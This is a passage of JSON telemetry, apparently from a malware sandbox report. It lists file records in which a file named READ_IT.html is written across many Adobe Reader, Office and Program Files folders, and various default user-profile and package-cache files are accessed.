10.0\\reader\\legal\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\notebook templates\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\fax\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Stationery\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\stationery\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\MYSL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\mysl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", "hashes": [], "norm_filename": "c:\\users\\public\\desktop\\adobe reader x.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Desktop\\Google Chrome.lnk", "hashes": [], "norm_filename": "c:\\users\\public\\desktop\\google chrome.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", "hashes": [], "norm_filename": "c:\\users\\public\\desktop\\mozilla firefox.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT.LOG", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT.LOG1", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat.log1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT.LOG2", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat.log2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\ntuser.ini", "hashes": [], "norm_filename": "c:\\users\\default\\ntuser.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Searches\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\searches\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Searches\\Everywhere.search-ms", "hashes": [], "norm_filename": "c:\\users\\default\\searches\\everywhere.search-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", "hashes": [], "norm_filename": "c:\\users\\default\\searches\\indexed locations.search-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Saved Games\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\saved games\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Links\\Desktop.lnk", "hashes": [], "norm_filename": "c:\\users\\default\\links\\desktop.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Links\\Downloads.lnk", "hashes": [], "norm_filename": "c:\\users\\default\\links\\downloads.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Links\\RecentPlaces.lnk", "hashes": [], "norm_filename": "c:\\users\\default\\links\\recentplaces.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\windows live\\get windows live.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\windows live\\windows live gallery.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\windows live\\windows live mail.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\windows live\\windows live spaces.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msn autos.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msn money.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msn sports.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msn.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\msn websites\\msnbc news.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\links\\web slice gallery.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Contacts\\Administrator.contact", "hashes": [], "norm_filename": "c:\\users\\default\\contacts\\administrator.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\Contacts\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\contacts\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\AppData\\Local\\IconCache.db", "hashes": [], "norm_filename": "c:\\users\\default\\appdata\\local\\iconcache.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", "hashes": [], "norm_filename": "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": 